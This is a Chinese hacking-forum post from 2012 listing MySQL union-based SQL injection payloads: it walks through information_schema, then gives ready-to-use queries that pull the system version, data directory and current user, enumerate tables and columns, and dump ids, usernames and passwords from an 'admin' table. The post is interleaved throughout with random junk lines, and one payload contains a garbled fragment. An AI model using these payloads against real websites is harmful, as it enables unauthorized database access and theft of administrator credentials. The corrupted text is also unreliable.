中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
! ]+ r( |" D+ D2 _( M
; X9 t, s p6 n& S N( Z P. X
学习盲注前先了解下 IFORMATION_SCHEMA 库
% D6 q7 M0 U& ]* p# z( x( f) k
% _7 D. k: t* M2 Y
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
( I' h# Y" f, r9 R/ W
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
4 E8 X4 }8 H$ u7 K9 h
1.得到所有数据库名:
; i( E# Z5 ~6 v3 I
|SCHEMATA ->存储数据库名的表
6 ]- K# L( t) p4 S, ]* g# a
|---字段:SCHEMA_NAME ->数据库名称
, T; L! C8 [$ z
6 m6 S D# c9 y: ~6 {3 i/ N5 ?
|TABLES ->存储表名
0 ^- m5 B z" Y" Y) [
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
8 J. K' O$ M# _1 d2 j- u" m
|---字段:TABLE_NAME ->存储表的表名
. b9 [2 K. A$ z) { _7 x4 P9 K$ @
2 i; d: f4 x% Z5 w
|COLUMNS ->存储的字段名表
% g/ Q# f& O; T9 }% r3 O6 d
|---字段:TABLE_SCHEMA ->该字段所属数据库名
; Z$ r/ r" h; y9 M' v0 T
|---字段:TABLE_NAME ->存储所属表的名称
; S+ D: M) C* M" ~
1 S, G- x5 b( W! }
|---字段:COLUMN_NAME ->该字段的名称
# d5 t* t3 r8 L1 |
* `. Y8 K( N9 b. x
/ S# N* S% ?) G9 |
; e: l. r4 L* ~
###########################################################################
! K8 T3 B6 w; r4 [: e- e }
. U/ T* ]3 ` n, }! k3 ?
0x001 获取系统信息:
( F, } r% B/ {) a4 C% q# n( x; E
4 K& i* x o" I& {3 N5 V/ \6 g1 g3 i5 G
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
6 Z+ c7 f, T4 ?1 j
+ |/ l1 l) s8 n7 P9 Q" y5 h
/*
5 V: |5 ^( o6 \1 t1 \7 F4 |: E. x+ V
( Z- C- v2 Z& X$ b! P# D: E* S' Q+ c
@@global.version_compile_os 获取系统版本
# b! F* H3 t' i
+ \/ V& z/ m* u
@@datadir 数据库路径
/ I, M# d- _; }4 A& F' g+ H9 i
database() 当前数据库名称
/ x# S/ h( ~( M1 L
0x3c62723e 换行HEX值
0 ^4 S) y) @: c# @0 G- m6 B3 V2 i
7 q9 q v9 `5 ^. |. m7 f& V2 z
*/
( ?& b$ b3 }. y, [# Q! u$ D2 y3 w
) ]7 _* B' G' ~8 A+ S+ f6 }
3 p5 e2 z; d6 ]/ ~* H8 e
% t! |. N0 o1 O! C: C( y) S
######################################################################
1 h p0 G/ g5 W7 M8 K
8 F& a; h$ Y- d: g3 d4 ] u! \
0x002 获取表名
- P9 r9 _; J, m
. L6 Y0 q- A* E3 w. t# G* ]
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- D& k# ]: D. ?9 }' q2 T
) c5 Z! P I) Z _: J
' M5 q: G1 ?8 n( k5 q; c5 F1 k
5 }* V* Z+ ~: h# y+ w* v
/*
" e1 j% j8 O& C; L8 h
. D" \$ m" X3 t& B) H3 b
0x67617264656e 为当前数据库名
z+ L" [4 O. L% W0 m
# b) Q' E: V5 |. ^! v2 x4 Q8 F$ w
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
0 i) \3 r0 u/ |2 L3 ]
$ y* L) B3 y: v* T: j5 Q Y
*/
. d6 x+ Y2 U \( F& a
4 ~( x' j( e- [6 |
######################################################################
7 o) }3 Z" R% X F8 Z
3 O2 u- V1 n& m: q" P
S* L5 B" d/ L& L- I
/ ^+ g a- @# O# @
0x003 获取字段
+ P2 ~/ c& Z" B! v" W! J7 `
! E& h* I0 x2 U; I7 @9 b6 Z
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
$ |$ f6 N9 r. I- r ], T
# O0 h0 J+ ]* Q7 G
/*
2 {, W$ J% q! x/ ?$ U( R
$ u" ~$ h: |2 ], r
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
& p* F+ x7 R8 _; W. \6 D* W
6 ~1 ^7 A7 T+ K
0x61646d696e ->选择一个表
, w, y3 R5 ~: n/ P* o
9 d' g; h5 {% d& D9 E2 s0 j- A0 P7 K
0x67617264656e ->数据库名
/ ]# n9 O0 F: w' c
1 R) d. e7 g, u2 ^+ d! Y7 J7 l, x: r
*/
! f8 |$ h+ H& S; H7 o, X
9 g2 y* [9 s5 u" q
#####################################################################
2 E. Z; T7 z8 G
0 H( k# J4 e$ d! [8 s* R5 N [
U& a$ V i5 Q- @3 h/ f/ I, G! p
8 P4 J2 R. t: W/ d4 X! m5 s$ O$ h2 T
0x004 获取数据
9 p3 o5 e$ V! v! k: s) [
]' I7 E. i; }5 ~3 f3 t
union select 1,2,3
7 G1 k5 ?5 d$ P& o, d
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
9 s- d/ C0 H8 H* Y: A
+ P- _ b( X: ?0 Z
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
3 D; G0 X; t. V O P
0 T9 d4 J, N' M& O5 x
3 F, S* f% L$ `5 l% ~, {3 u
/ W. j& [7 {+ I, O( j5 r3 I
/*
9 ], u7 x# f1 J; O9 _. X
1 C7 r. H6 D# T" [/ h- a& q, \
0x3c62723e 换行符号HEX编码
$ B& o( ~ m- a3 o" t
s' i. q6 f G' E
group_concat 同时获得该字段所有数据
' X2 j3 ?, q( G |' c2 X
9 g1 q+ a4 h7 P% V" e: O9 O$ c$ F
*/
7 x/ K# B t, g6 r
2 [4 ^4 e2 u/ t/ R' C
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2